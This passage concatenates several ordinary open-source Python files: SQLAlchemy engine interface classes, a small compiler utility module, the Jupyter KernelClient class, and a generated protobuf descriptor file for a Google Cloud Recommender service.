positional, list or list of lists/tuples for positional).
isinsert
True if the statement is an INSERT.
isupdate
True if the statement is an UPDATE.
should_autocommit
True if the statement is a "committable" statement.
prefetch_cols
a list of Column objects for which a client-side default
was fired off. Applies to inserts and updates.
postfetch_cols
a list of Column objects for which a server-side default or
inline SQL expression value was fired off. Applies to inserts
and updates.
"""
def create_cursor(self):
"""Return a new cursor generated from this ExecutionContext's
connection.
Some dialects may wish to change the behavior of
connection.cursor(), such as postgresql which may return a PG
"server side" cursor.
"""
raise NotImplementedError()
def pre_exec(self):
"""Called before an execution of a compiled statement.
If a compiled statement was passed to this ExecutionContext,
the `statement` and `parameters` datamembers must be
initialized after this statement is complete.
"""
raise NotImplementedError()
def post_exec(self):
"""Called after the execution of a compiled statement.
If a compiled statement was passed to this ExecutionContext,
the `last_insert_ids`, `last_inserted_params`, etc.
datamembers should be available after this method completes.
"""
raise NotImplementedError()
def result(self):
"""Return a result object corresponding to this ExecutionContext.
Returns a ResultProxy.
"""
raise NotImplementedError()
def handle_dbapi_exception(self, e):
"""Receive a DBAPI exception which occurred upon execute, result
fetch, etc."""
raise NotImplementedError()
def should_autocommit_text(self, statement):
"""Parse the given textual statement and return True if it refers to
a "committable" statement"""
raise NotImplementedError()
def lastrow_has_defaults(self):
"""Return True if the last INSERT or UPDATE row contained
inlined or database-side defaults.
"""
raise NotImplementedError()
def get_rowcount(self):
"""Return the DBAPI ``cursor.rowcount`` value, or in some
cases an interpreted value.
See :attr:`.ResultProxy.rowcount` for details on this.
"""
raise NotImplementedError()
class Compiled(object):
"""Represent a compiled SQL or DDL expression.
The ``__str__`` method of the ``Compiled`` object should produce
the actual text of the statement. ``Compiled`` objects are
specific to their underlying database dialect, and also may
or may not be specific to the columns referenced within a
particular set of bind parameters. In no case should the
``Compiled`` object be dependent on the actual values of those
bind parameters, even though it may reference those values as
defaults.
"""
def __init__(self, dialect, statement, bind=None,
compile_kwargs=util.immutabledict()):
"""Construct a new ``Compiled`` object.
:param dialect: ``Dialect`` to compile against.
:param statement: ``ClauseElement`` to be compiled.
:param bind: Optional Engine or Connection to compile this
statement against.
:param compile_kwargs: additional kwargs that will be
passed to the initial call to :meth:`.Compiled.process`.
.. versionadded:: 0.8
"""
self.dialect = dialect
self.bind = bind
if statement is not None:
self.statement = statement
self.can_execute = statement.supports_execution
self.string = self.process(self.statement, **compile_kwargs)
@util.deprecated("0.7", ":class:`.Compiled` objects now compile "
"within the constructor.")
def compile(self):
"""Produce the internal string representation of this element."""
pass
@property
def sql_compiler(self):
"""Return a Compiled that is capable of processing SQL expressions.
If this compiler is one, it would likely just return 'self'.
"""
raise NotImplementedError()
def process(self, obj, **kwargs):
return obj._compiler_dispatch(self, **kwargs)
def __str__(self):
"""Return the string text of the generated SQL or DDL."""
return self.string or ''
def construct_params(self, params=None):
"""Return the bind params for this compiled object.
:param params: a dict of string/object pairs whose values will
override bind values compiled in to the
statement.
"""
raise NotImplementedError()
@property
def params(self):
"""Return the bind params for this compiled object."""
return self.construct_params()
def execute(self, *multiparams, **params):
"""Execute this compiled object."""
e = self.bind
if e is None:
raise exc.UnboundExecutionError(
"This Compiled object is not bound to any Engine "
"or Connection.")
return e._execute_compiled(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Execute this compiled object and return the result's
scalar value."""
return self.execute(*multiparams, **params).scalar()
class TypeCompiler(object):
"""Produces DDL specification for TypeEngine objects."""
def __init__(self, dialect):
self.dialect = dialect
def process(self, type_):
return type_._compiler_dispatch(self)
class Connectable(object):
"""Interface for an object which supports execution of SQL constructs.
The two implementations of :class:`.Connectable` are
:class:`.Connection` and :class:`.Engine`.
Connectable must also implement the 'dialect' member which references a
:class:`.Dialect` instance.
"""
dispatch = event.dispatcher(events.ConnectionEvents)
def connect(self, **kwargs):
"""Return a :class:`.Connection` object.
Depending on context, this may be ``self`` if this object
is already an instance of :class:`.Connection`, or a newly
procured :class:`.Connection` if this object is an instance
of :class:`.Engine`.
"""
def contextual_connect(self):
"""Return a :class:`.Connection` object which may be part of an ongoing
context.
Depending on context, this may be ``self`` if this object
is already an instance of :class:`.Connection`, or a newly
procured :class:`.Connection` if this object is an instance
of :class:`.Engine`.
"""
raise NotImplementedError()
@util.deprecated("0.7",
"Use the create() method on the given schema "
"object directly, i.e. :meth:`.Table.create`, "
":meth:`.Index.create`, :meth:`.MetaData.create_all`")
def create(self, entity, **kwargs):
"""Emit CREATE statements for the given schema entity."""
raise NotImplementedError()
@util.deprecated("0.7",
"Use the drop() method on the given schema "
"object directly, i.e. :meth:`.Table.drop`, "
":meth:`.Index.drop`, :meth:`.MetaData.drop_all`")
def drop(self, entity, **kwargs):
"""Emit DROP statements for the given schema entity."""
raise NotImplementedError()
def execute(self, object, *multiparams, **params):
"""Executes the given construct and returns a :class:`.ResultProxy`."""
raise NotImplementedError()
def scalar(self, object, *multiparams, **params):
"""Executes and returns the first column of the first row.
The underlying cursor is closed after execution.
"""
raise NotImplementedError()
def _run_visitor(self, visitorcallable, element,
**kwargs):
raise NotImplementedError()
def _execute_clauseelement(self, elem, multiparams=None, params=None):
raise NotImplementedError()
| apache-2.0 |
fitermay/intellij-community | python/lib/Lib/compiler/misc.py | 100 | 1806 |
def flatten(tup):
elts = []
for elt in tup:
if isinstance(elt, tuple):
elts = elts + flatten(elt)
else:
elts.append(elt)
return elts
class Set:
def __init__(self):
self.elts = {}
def __len__(self):
return len(self.elts)
def __contains__(self, elt):
return self.elts.has_key(elt)
def add(self, elt):
self.elts[elt] = elt
def elements(self):
return self.elts.keys()
def has_elt(self, elt):
return self.elts.has_key(elt)
def remove(self, elt):
del self.elts[elt]
def copy(self):
c = Set()
c.elts.update(self.elts)
return c
class Stack:
def __init__(self):
self.stack = []
self.pop = self.stack.pop
def __len__(self):
return len(self.stack)
def push(self, elt):
self.stack.append(elt)
def top(self):
return self.stack[-1]
def __getitem__(self, index): # needed by visitContinue()
return self.stack[index]
MANGLE_LEN = 256 # magic constant from compile.c
def mangle(name, klass):
if not name.startswith('__'):
return name
if len(name) + 2 >= MANGLE_LEN:
return name
if name.endswith('__'):
return name
try:
i = 0
while klass[i] == '_':
i = i + 1
except IndexError:
return name
klass = klass[i:]
tlen = len(klass) + len(name)
if tlen > MANGLE_LEN:
klass = klass[:MANGLE_LEN-tlen]
return "_%s%s" % (klass, name)
def set_filename(filename, tree):
"""Set the filename attribute to filename on every node in tree"""
worklist = [tree]
while worklist:
node = worklist.pop(0)
node.filename = filename
worklist.extend(node.getChildNodes())
| apache-2.0 |
Edu-Glez/Bank_sentiment_analysis | env/lib/python3.6/site-packages/jupyter_client/client.py | 5 | 15619 | """Base class to manage the interaction with a running kernel"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import
from jupyter_client.channels import major_protocol_version
from ipython_genutils.py3compat import string_types, iteritems
import zmq
from traitlets import (
Any, Instance, Type,
)
from .channelsabc import (ChannelABC, HBChannelABC)
from .clientabc import KernelClientABC
from .connect import ConnectionFileMixin
# some utilities to validate message structure, these might get moved elsewhere
# if they prove to have more generic utility
def validate_string_dict(dct):
"""Validate that the input is a dict with string keys and values.
Raises ValueError if not."""
for k,v in iteritems(dct):
if not isinstance(k, string_types):
raise ValueError('key %r in dict must be a string' % k)
if not isinstance(v, string_types):
raise ValueError('value %r in dict must be a string' % v)
class KernelClient(ConnectionFileMixin):
"""Communicates with a single kernel on any host via zmq channels.
There are four channels associated with each kernel:
* shell: for request/reply calls to the kernel.
* iopub: for the kernel to publish results to frontends.
* hb: for monitoring the kernel's heartbeat.
* stdin: for frontends to reply to raw_input calls in the kernel.
The messages that can be sent on these channels are exposed as methods of the
client (KernelClient.execute, complete, history, etc.). These methods only
send the message, they don't wait for a reply. To get results, use e.g.
:meth:`get_shell_msg` to fetch messages from the shell channel.
"""
# The PyZMQ Context to use for communication with the kernel.
context = Instance(zmq.Context)
def _context_default(self):
return zmq.Context.instance()
# The classes to use for the various channels
shell_channel_class = Type(ChannelABC)
iopub_channel_class = Type(ChannelABC)
stdin_channel_class = Type(ChannelABC)
hb_channel_class = Type(HBChannelABC)
# Protected traits
_shell_channel = Any()
_iopub_channel = Any()
_stdin_channel = Any()
_hb_channel = Any()
# flag for whether execute requests should be allowed to call raw_input:
allow_stdin = True
#--------------------------------------------------------------------------
# Channel proxy methods
#--------------------------------------------------------------------------
def get_shell_msg(self, *args, **kwargs):
"""Get a message from the shell channel"""
return self.shell_channel.get_msg(*args, **kwargs)
def get_iopub_msg(self, *args, **kwargs):
"""Get a message from the iopub channel"""
return self.iopub_channel.get_msg(*args, **kwargs)
def get_stdin_msg(self, *args, **kwargs):
"""Get a message from the stdin channel"""
return self.stdin_channel.get_msg(*args, **kwargs)
#--------------------------------------------------------------------------
# Channel management methods
#--------------------------------------------------------------------------
def start_channels(self, shell=True, iopub=True, stdin=True, hb=True):
"""Starts the channels for this kernel.
This will create the channels if they do not exist and then start
them (their activity runs in a thread). If port numbers of 0 are
being used (random ports) then you must first call
:meth:`start_kernel`. If the channels have been stopped and you
call this, :class:`RuntimeError` will be raised.
"""
if shell:
self.shell_channel.start()
self.kernel_info()
if iopub:
self.iopub_channel.start()
if stdin:
self.stdin_channel.start()
self.allow_stdin = True
else:
self.allow_stdin = False
if hb:
self.hb_channel.start()
def stop_channels(self):
"""Stops all the running channels for this kernel.
This stops their event loops and joins their threads.
"""
if self.shell_channel.is_alive():
self.shell_channel.stop()
if self.iopub_channel.is_alive():
self.iopub_channel.stop()
if self.stdin_channel.is_alive():
self.stdin_channel.stop()
if self.hb_channel.is_alive():
self.hb_channel.stop()
@property
def channels_running(self):
"""Are any of the channels created and running?"""
return (self.shell_channel.is_alive() or self.iopub_channel.is_alive() or
self.stdin_channel.is_alive() or self.hb_channel.is_alive())
ioloop = None # Overridden in subclasses that use pyzmq event loop
@property
def shell_channel(self):
"""Get the shell channel object for this kernel."""
if self._shell_channel is None:
url = self._make_url('shell')
self.log.debug("connecting shell channel to %s", url)
socket = self.connect_shell(identity=self.session.bsession)
self._shell_channel = self.shell_channel_class(
socket, self.session, self.ioloop
)
return self._shell_channel
@property
def iopub_channel(self):
"""Get the iopub channel object for this kernel."""
if self._iopub_channel is None:
url = self._make_url('iopub')
self.log.debug("connecting iopub channel to %s", url)
socket = self.connect_iopub()
self._iopub_channel = self.iopub_channel_class(
socket, self.session, self.ioloop
)
return self._iopub_channel
@property
def stdin_channel(self):
"""Get the stdin channel object for this kernel."""
if self._stdin_channel is None:
url = self._make_url('stdin')
self.log.debug("connecting stdin channel to %s", url)
socket = self.connect_stdin(identity=self.session.bsession)
self._stdin_channel = self.stdin_channel_class(
socket, self.session, self.ioloop
)
return self._stdin_channel
@property
def hb_channel(self):
"""Get the hb channel object for this kernel."""
if self._hb_channel is None:
url = self._make_url('hb')
self.log.debug("connecting heartbeat channel to %s", url)
self._hb_channel = self.hb_channel_class(
self.context, self.session, url
)
return self._hb_channel
def is_alive(self):
"""Is the kernel process still running?"""
from .manager import KernelManager
if isinstance(self.parent, KernelManager):
# This KernelClient was created by a KernelManager,
# we can ask the parent KernelManager:
return self.parent.is_alive()
if self._hb_channel is not None:
# We don't have access to the KernelManager,
# so we use the heartbeat.
return self._hb_channel.is_beating()
else:
# no heartbeat and not local, we can't tell if it's running,
# so naively return True
return True
# Methods to send specific messages on channels
def execute(self, code, silent=False, store_history=True,
user_expressions=None, allow_stdin=None, stop_on_error=True):
"""Execute code in the kernel.
Parameters
----------
code : str
A string of code in the kernel's language.
silent : bool, optional (default False)
If set, the kernel will execute the code as quietly possible, and
will force store_history to be False.
store_history : bool, optional (default True)
If set, the kernel will store command history. This is forced
to be False if silent is True.
user_expressions : dict, optional
A dict mapping names to expressions to be evaluated in the user's
dict. The expression values are returned as strings formatted using
:func:`repr`.
allow_stdin : bool, optional (default self.allow_stdin)
Flag for whether the kernel can send stdin requests to frontends.
Some frontends (e.g. the Notebook) do not support stdin requests.
If raw_input is called from code executed from such a frontend, a
StdinNotImplementedError will be raised.
stop_on_error: bool, optional (default True)
Flag whether to abort the execution queue, if an exception is encountered.
Returns
-------
The msg_id of the message sent.
"""
if user_expressions is None:
user_expressions = {}
if allow_stdin is None:
allow_stdin = self.allow_stdin
# Don't waste network traffic if inputs are invalid
if not isinstance(code, string_types):
raise ValueError('code %r must be a string' % code)
validate_string_dict(user_expressions)
# Create class for content/msg creation. Related to, but possibly
# not in Session.
content = dict(code=code, silent=silent, store_history=store_history,
user_expressions=user_expressions,
allow_stdin=allow_stdin, stop_on_error=stop_on_error
)
msg = self.session.msg('execute_request', content)
self.shell_channel.send(msg)
return msg['header']['msg_id']
def complete(self, code, cursor_pos=None):
"""Tab complete text in the kernel's namespace.
Parameters
----------
code : str
The context in which completion is requested.
Can be anything between a variable name and an entire cell.
cursor_pos : int, optional
The position of the cursor in the block of code where the completion was requested.
Default: ``len(code)``
Returns
-------
The msg_id of the message sent.
"""
if cursor_pos is None:
cursor_pos = len(code)
content = dict(code=code, cursor_pos=cursor_pos)
msg = self.session.msg('complete_request', content)
self.shell_channel.send(msg)
return msg['header']['msg_id']
def inspect(self, code, cursor_pos=None, detail_level=0):
"""Get metadata information about an object in the kernel's namespace.
It is up to the kernel to determine the appropriate object to inspect.
Parameters
----------
code : str
The context in which info is requested.
Can be anything between a variable name and an entire cell.
cursor_pos : int, optional
The position of the cursor in the block of code where the info was requested.
Default: ``len(code)``
detail_level : int, optional
The level of detail for the introspection (0-2)
Returns
-------
The msg_id of the message sent.
"""
if cursor_pos is None:
cursor_pos = len(code)
content = dict(code=code, cursor_pos=cursor_pos,
detail_level=detail_level,
)
msg = self.session.msg('inspect_request', content)
self.shell_channel.send(msg)
return msg['header']['msg_id']
def history(self, raw=True, output=False, hist_access_type='range', **kwargs):
"""Get entries from the kernel's history list.
Parameters
----------
raw : bool
If True, return the raw input.
output : bool
If True, then return the output as well.
hist_access_type : str
'range' (fill in session, start and stop params), 'tail' (fill in n)
or 'search' (fill in pattern param).
session : int
For a range request, the session from which to get lines. Session
numbers are positive integers; negative ones count back from the
current session.
start : int
The first line number of a history range.
stop : int
The final (excluded) line number of a history range.
n : int
The number of lines of history to get for a tail request.
pattern : str
The glob-syntax pattern for a search request.
Returns
-------
The ID of the message sent.
"""
if hist_access_type == 'range':
kwargs.setdefault('session', 0)
kwargs.setdefault('start', 0)
content = dict(raw=raw, output=output, hist_access_type=hist_access_type,
**kwargs)
msg = self.session.msg('history_request', content)
self.shell_channel.send(msg)
return msg['header']['msg_id']
def kernel_info(self):
"""Request kernel info
Returns
-------
The msg_id of the message sent
"""
msg = self.session.msg('kernel_info_request')
self.shell_channel.send(msg)
return msg['header']['msg_id']
def comm_info(self, target_name=None):
"""Request comm info
Returns
-------
The msg_id of the message sent
"""
if target_name is None:
content = {}
else:
content = dict(target_name=target_name)
msg = self.session.msg('comm_info_request', content)
self.shell_channel.send(msg)
return msg['header']['msg_id']
def _handle_kernel_info_reply(self, msg):
"""handle kernel info reply
sets protocol adaptation version. This might
be run from a separate thread.
"""
adapt_version = int(msg['content']['protocol_version'].split('.')[0])
if adapt_version != major_protocol_version:
self.session.adapt_version = adapt_version
def shutdown(self, restart=False):
"""Request an immediate kernel shutdown.
Upon receipt of the (empty) reply, client code can safely assume that
the kernel has shut down and it's safe to forcefully terminate it if
it's still alive.
The kernel will send the reply via a function registered with Python's
atexit module, ensuring it's truly done as the kernel is done with all
normal operation.
Returns
-------
The msg_id of the message sent
"""
# Send quit message to kernel. Once we implement kernel-side setattr,
# this should probably be done that way, but for now this will do.
msg = self.session.msg('shutdown_request', {'restart':restart})
self.shell_channel.send(msg)
return msg['header']['msg_id']
def is_complete(self, code):
"""Ask the kernel whether some code is complete and ready to execute."""
msg = self.session.msg('is_complete_request', {'code': code})
self.shell_channel.send(msg)
return msg['header']['msg_id']
def input(self, string):
"""Send a string of raw input to the kernel.
This should only be called in response to the kernel sending an
``input_request`` message on the stdin channel.
"""
content = dict(value=string)
msg = self.session.msg('input_reply', content)
self.stdin_channel.send(msg)
KernelClientABC.register(KernelClient)
| apache-2.0 |
tseaver/google-cloud-python | recommender/google/cloud/recommender_v1beta1/proto/recommender_service_pb2.py | 2 | 35581 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/recommender_v1beta1/proto/recommender_service.proto
import sys
_b = sys.version_info[0] < 3 and (lambda x: x) or (lambda x: x.encode("latin1"))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.cloud.recommender_v1beta1.proto import (
recommendation_pb2 as google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2,
)
from google.longrunning import (
operations_pb2 as google_dot_longrunning_dot_operations__pb2,
)
from google.api import client_pb2 as google_dot_api_dot_client__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="google/cloud/recommender_v1beta1/proto/recommender_service.proto",
package="google.cloud.recommender.v1beta1",
syntax="proto3",
serialized_options=_b(
"\n$com.google.cloud.recommender.v1beta1B\020RecommenderProtoP\001ZKgoogle.golang.org/genproto/googleapis/cloud/recommender/v1beta1;recommender\242\002\004CREC\252\002!Google.Cloud.Recommmender.V1Beta1"
),
serialized_pb=_b(
'\n@google/cloud/recommender_v1beta1/proto/recommender_service.proto\x12 google.cloud.recommender.v1beta1\x1a\x1cgoogle/api/annotations.proto\x1a;google/cloud/recommender_v1beta1/proto/recommendation.proto\x1a#google/longrunning/operations.proto\x1a\x17google/api/client.proto"c\n\x1aListRecommendationsRequest\x12\x0e\n\x06parent\x18\x01 \x01(\t\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\x12\x0e\n\x06\x66ilter\x18\x05 \x01(\t"\x81\x01\n\x1bListRecommendationsResponse\x12I\n\x0frecommendations\x18\x01 \x03(\x0b\x32\x30.google.cloud.recommender.v1beta1.Recommendation\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t"(\n\x18GetRecommendationRequest\x12\x0c\n\x04name\x18\x01 \x01(\t"\xe3\x01\n MarkRecommendationClaimedRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12m\n\x0estate_metadata\x18\x02 \x03(\x0b\x32U.google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry\x12\x0c\n\x04\x65tag\x18\x03 \x01(\t\x1a\x34\n\x12StateMetadataEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01"\xe7\x01\n"MarkRecommendationSucceededRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12o\n\x0estate_metadata\x18\x02 \x03(\x0b\x32W.google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry\x12\x0c\n\x04\x65tag\x18\x03 \x01(\t\x1a\x34\n\x12StateMetadataEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01"\xe1\x01\n\x1fMarkRecommendationFailedRequest\x12\x0c\n\x04name\x18\x01 \x01(\t\x12l\n\x0estate_metadata\x18\x02 \x03(\x0b\x32T.google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry\x12\x0c\n\x04\x65tag\x18\x03 \x01(\t\x1a\x34\n\x12StateMetadataEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x32\xf7\t\n\x0bRecommender\x12\xe3\x01\n\x13ListRecommendations\x12<.google.cloud.recommender.v1beta1.ListRecommendationsRequest\x1a=.google.cloud.recommender.v1beta1.ListRecommendationsResponse"O\x82\xd3\xe4\x93\x02I\x12G/v1beta1/{parent=projects/*/locations/*/recommenders/*}/recommendations\x12\xd2\x01\n\x11GetRecommendation\x12:.google.cloud.recommender.v1beta1.GetRecommendationRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"O\x82\xd3\xe4\x93\x02I\x12G/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}\x12\xf1\x01\n\x19MarkRecommendationClaimed\x12\x42.google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"^\x82\xd3\xe4\x93\x02X"S/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markClaimed:\x01*\x12\xf7\x01\n\x1bMarkRecommendationSucceeded\x12\x44.google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"`\x82\xd3\xe4\x93\x02Z"U/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markSucceeded:\x01*\x12\xee\x01\n\x18MarkRecommendationFailed\x12\x41.google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest\x1a\x30.google.cloud.recommender.v1beta1.Recommendation"]\x82\xd3\xe4\x93\x02W"R/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markFailed:\x01*\x1aN\xca\x41\x1arecommender.googleapis.com\xd2\x41.https://www.googleapis.com/auth/cloud-platformB\xb2\x01\n$com.google.cloud.recommender.v1beta1B\x10RecommenderProtoP\x01ZKgoogle.golang.org/genproto/googleapis/cloud/recommender/v1beta1;recommender\xa2\x02\x04\x43REC\xaa\x02!Google.Cloud.Recommmender.V1Beta1b\x06proto3'
),
dependencies=[
google_dot_api_dot_annotations__pb2.DESCRIPTOR,
google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2.DESCRIPTOR,
google_dot_longrunning_dot_operations__pb2.DESCRIPTOR,
google_dot_api_dot_client__pb2.DESCRIPTOR,
],
)
_LISTRECOMMENDATIONSREQUEST = _descriptor.Descriptor(
name="ListRecommendationsRequest",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="parent",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.parent",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_size",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.page_size",
index=1,
number=2,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_token",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.page_token",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="filter",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsRequest.filter",
index=3,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=255,
serialized_end=354,
)
_LISTRECOMMENDATIONSRESPONSE = _descriptor.Descriptor(
name="ListRecommendationsResponse",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="recommendations",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsResponse.recommendations",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="next_page_token",
full_name="google.cloud.recommender.v1beta1.ListRecommendationsResponse.next_page_token",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=357,
serialized_end=486,
)
_GETRECOMMENDATIONREQUEST = _descriptor.Descriptor(
name="GetRecommendationRequest",
full_name="google.cloud.recommender.v1beta1.GetRecommendationRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.recommender.v1beta1.GetRecommendationRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=488,
serialized_end=528,
)
_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY = _descriptor.Descriptor(
name="StateMetadataEntry",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=706,
serialized_end=758,
)
_MARKRECOMMENDATIONCLAIMEDREQUEST = _descriptor.Descriptor(
name="MarkRecommendationClaimedRequest",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="state_metadata",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.state_metadata",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="etag",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.etag",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=531,
serialized_end=758,
)
_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY = _descriptor.Descriptor(
name="StateMetadataEntry",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry.value",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=706,
serialized_end=758,
)
_MARKRECOMMENDATIONSUCCEEDEDREQUEST = _descriptor.Descriptor(
